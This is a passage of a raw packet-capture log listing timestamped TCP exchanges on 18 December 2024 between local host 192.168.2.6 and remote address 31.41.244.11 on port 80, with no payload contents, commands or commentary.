                                                                                                                                                              Dec 18, 2024 11:47:44.338053942 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.338078976 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.338095903 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.338149071 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.338192940 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.338212967 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.338228941 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.338247061 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.338258982 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.338340044 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.338356018 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.338371992 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.338382006 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.338391066 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.338422060 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.338466883 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.338505983 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.338581085 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.338597059 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.338612080 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.338622093 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.338627100 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.338637114 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.338643074 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.338654041 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.338660002 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.338676929 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.338701010 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.338865995 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.338881016 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.338896990 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.338907957 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.338910103 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.338926077 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.338952065 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.461663961 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.461703062 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.461796045 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.462177038 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.462209940 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.462228060 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.462352991 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.462399960 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.463356018 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.463403940 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.463731050 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.463778019 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.463932991 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.463978052 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.464972973 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.465014935 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.465056896 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.465096951 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.466161966 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.466211081 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.466283083 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.466325045 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.467344999 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.467396975 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.467478991 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.467528105 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.468497992 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.468548059 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.468625069 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.468664885 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.469669104 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.469715118 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.469748974 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.469788074 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.470875025 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.470921993 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.470994949 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.471034050 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.472022057 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.472069025 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.472115993 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.472155094 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.473231077 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.473278046 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.473336935 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.473376036 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.474419117 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.474466085 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.474512100 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.474560976 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.475688934 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.475739956 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.475822926 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.475863934 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.476775885 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.476830006 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.476861000 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.476896048 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.477933884 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.477982998 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.478116035 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.478153944 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.479114056 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.479159117 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.479202032 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.479238033 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.480295897 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.480339050 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.480385065 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.480423927 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.481482983 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.481529951 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.481616020 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.481656075 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.482851982 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.482907057 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.482927084 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.482964039 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.483884096 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.483933926 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.483972073 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.484011889 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.485090971 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.485150099 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.485227108 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.485270977 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.486279964 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.486327887 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.486401081 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.486439943 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.487481117 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.487529039 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.487570047 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.487605095 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.488629103 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.488677025 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.488748074 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.488787889 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.489784956 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.489834070 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.489886999 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.489928007 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.490964890 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.491013050 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.491079092 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.491118908 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.492207050 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.492255926 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.492427111 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.492466927 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.493340015 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.493388891 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.493447065 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.493490934 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.494502068 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.494551897 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.494631052 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.494672060 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.495738983 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.495788097 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.495922089 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.495966911 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.496929884 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.496973038 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.497037888 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.497076988 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.498123884 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.498172045 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.498215914 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.498255968 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.499387026 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.499452114 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.499572992 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.499614000 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.500430107 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.500478983 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.500514984 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.500559092 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.501656055 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.501710892 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.501774073 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.501815081 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.502826929 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.502876997 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.502885103 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.502933025 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.504069090 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.504102945 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.504126072 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.504138947 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.505225897 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.505275965 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.505317926 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.505357981 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.506371021 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.506431103 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.506474018 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.506510973 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.507615089 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.507667065 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.507684946 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.507723093 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.508702993 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.508774042 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.508800983 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.508841991 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.509905100 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.509955883 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.509995937 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.510041952 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.511107922 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.511152983 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.511207104 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.511245012 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.512270927 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.512326956 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.512378931 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.512420893 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.513428926 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.513479948 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.513612032 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.513709068 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.514652967 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.514704943 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.514750957 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.514790058 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.515810013 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.515856028 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.515933037 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.515971899 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.516984940 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.517102003 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.517122030 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.517167091 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.518218040 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.518270969 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.518316031 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.518362999 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.519342899 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.519402027 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.519515991 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.519556999 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.520540953 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.520591021 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.520638943 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.520678043 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.521755934 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.521791935 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.521816015 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.521835089 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.522933006 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.522985935 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.523024082 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.523063898 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.652724028 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.652795076 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.652795076 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.652841091 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.653279066 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.653527021 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.653552055 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.653573036 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.653645992 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.653687000 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.654695034 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.654726982 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.654741049 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.655097008 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.655879021 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.655926943 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.656025887 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.656065941 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.657022953 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.657114029 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.657243013 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.657320023 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.658278942 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.658333063 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.658379078 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.658426046 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.659451962 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.659506083 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.659554958 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.659600973 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.660561085 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.660618067 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.660698891 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.660739899 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.661869049 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.661921024 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.661922932 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.661956072 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.662974119 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.663028955 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.663067102 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.663105965 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.664171934 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.664247036 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.664275885 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.664344072 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.665323019 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.665404081 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.665419102 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.665452957 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.666496038 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.666547060 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.666676998 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.666712999 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.667656898 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.667696953 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.667783976 CET804987831.41.244.11192.168.2.6
